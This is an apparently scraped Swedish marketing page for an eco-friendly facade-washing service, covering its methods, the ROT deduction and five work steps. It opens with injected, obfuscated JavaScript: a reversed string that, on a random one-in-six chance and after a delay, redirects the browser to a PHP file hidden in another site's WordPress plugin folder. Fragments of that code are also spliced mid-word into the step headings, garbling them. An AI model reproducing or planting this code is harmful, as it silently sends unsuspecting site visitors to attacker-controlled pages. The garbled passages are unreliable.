) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top_padding=”70″ bottom_padding=”70″ overlay_strength=”0.3″ shape_divider_position=”bottom” shape_type=””]

Miljövänlig fasadtvätt

Genom att vi endast arbetar med godkända medel kan du vara säker på att din fasadtvätt inte påverkar miljön. Vi sköljer dessutom med ultrarent vatten. En långsiktig och hållbar lösning är det bästa och det vill vi ge dig.

Effektiv fasadvård

Är det möjligt att arbeta med miljövänliga medel och samtidigt få ett enastående resultat? Absolut! Vi arbetar med det bästa på marknaden och din fasad blir ren, det garanterar vi.

Ultraren fasadtvätt

Vissa ytor tål inte att tvättas med tryck av olika anledningar. Med ultrarent vatten tvättas ytan med lågtryck och mjuka borstar. Långa lansar gör att vi når de flesta ytor från mark.

Använd rotavdrag

Ofta får vi reaktionen ”men det var ju inte dyrt” när vi berättar vad en taktvätt kostar. Det är billigare än vad en förväntar sig. Dessutom kan du använda rotavdraget för att ytterligare minska investeringen. För en investering är det, i din fastighet och även i området, då området blir trevligare med rena hus.

Så här jobbar vi

1. Avdödning

Besprutning av fasad med Bevara Fasadvård, vid kraftig påväxt krävs mekanisk bearbetning först. Medlet behöver verka i några dagar.

2. Hetvattentvätt

Tvätt med för ytan rätt temperatur och tryck, tvättmedel beroende på ommålning eller underhållstvätt.

3. BEVARA Behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling

Vid underhållstvätt efterbehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlas ytan med Bevara Fasadvård för att förhindra ny påväxt.

4. Städning

Vi tvättar av uteplatser och plattsättningar som eventuellt blivit nedstänkta.

5. Garanti

Bevara Fasadvård är testat av SP och det självklara valet både ur miljö och effektsynpunkt.